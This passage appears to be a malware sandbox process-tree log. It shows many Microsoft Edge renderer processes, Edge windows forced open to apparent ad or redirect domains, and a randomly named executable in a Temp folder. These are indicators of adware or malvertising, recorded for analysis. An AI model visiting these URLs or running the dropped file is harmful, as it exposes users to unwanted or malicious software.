                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1
                                                                                              10⤵
                                                                                                PID:4900
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:1
                                                                                                10⤵
                                                                                                  PID:6916
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:1
                                                                                                  10⤵
                                                                                                    PID:2088
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
                                                                                                    10⤵
                                                                                                      PID:6084
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1232 /prefetch:1
                                                                                                      10⤵
                                                                                                        PID:5892
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4448 /prefetch:8
                                                                                                        10⤵
                                                                                                          PID:3060
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                                                                                                          10⤵
                                                                                                            PID:1428
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
                                                                                                            10⤵
                                                                                                              PID:716
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
                                                                                                              10⤵
                                                                                                                PID:1048
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
                                                                                                                10⤵
                                                                                                                  PID:3088
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1852 /prefetch:1
                                                                                                                  10⤵
                                                                                                                    PID:2516
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2992 /prefetch:1
                                                                                                                    10⤵
                                                                                                                      PID:6888
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
                                                                                                                      10⤵
                                                                                                                        PID:928
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
                                                                                                                        10⤵
                                                                                                                          PID:2340
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
                                                                                                                          10⤵
                                                                                                                            PID:3620
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=184 /prefetch:1
                                                                                                                            10⤵
                                                                                                                              PID:2552
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
                                                                                                                              10⤵
                                                                                                                                PID:7688
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
                                                                                                                                10⤵
                                                                                                                                  PID:6372
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
                                                                                                                                  10⤵
                                                                                                                                    PID:7548
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5348 /prefetch:8
                                                                                                                                    10⤵
                                                                                                                                      PID:1488
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:8
                                                                                                                                      10⤵
                                                                                                                                        PID:7584
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5044 /prefetch:8
                                                                                                                                        10⤵
                                                                                                                                          PID:8004
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
                                                                                                                                          10⤵
                                                                                                                                            PID:1300
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
                                                                                                                                            10⤵
                                                                                                                                              PID:4580
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
                                                                                                                                              10⤵
                                                                                                                                                PID:4072
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:8
                                                                                                                                                10⤵
                                                                                                                                                  PID:3840
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
                                                                                                                                                  10⤵
                                                                                                                                                    PID:5420
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
                                                                                                                                                    10⤵
                                                                                                                                                      PID:4868
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
                                                                                                                                                      10⤵
                                                                                                                                                        PID:2516
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
                                                                                                                                                        10⤵
                                                                                                                                                          PID:4500
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
                                                                                                                                                          10⤵
                                                                                                                                                            PID:5848
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1
                                                                                                                                                            10⤵
                                                                                                                                                              PID:2340
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:1
                                                                                                                                                              10⤵
                                                                                                                                                                PID:6616
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:1
                                                                                                                                                                10⤵
                                                                                                                                                                  PID:1948
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:1
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:6280
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:1
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:7660
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:6716
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:1
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:4980
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:2536
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:6024
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:1
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:5356
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:5264
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3f5746f8,0x7ffd3f574708,0x7ffd3f574718
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:3336
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:664
                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3f5746f8,0x7ffd3f574708,0x7ffd3f574718
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:6004
                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:8024
                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3f5746f8,0x7ffd3f574708,0x7ffd3f574718
                                                                                                                                                                                          10⤵
                                                                                                                                                                                            PID:4640
                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:8140
                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3f5746f8,0x7ffd3f574708,0x7ffd3f574718
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:2024
                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:4964
                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3f5746f8,0x7ffd3f574708,0x7ffd3f574718
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:5700
                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                    PID:6136
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3f5746f8,0x7ffd3f574708,0x7ffd3f574718
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:6452
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:4724
                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3f5746f8,0x7ffd3f574708,0x7ffd3f574718
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:2324
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\24-7fa0d-d90-ad598-73430ff05b5ad\Xaewevebaeqo.exe
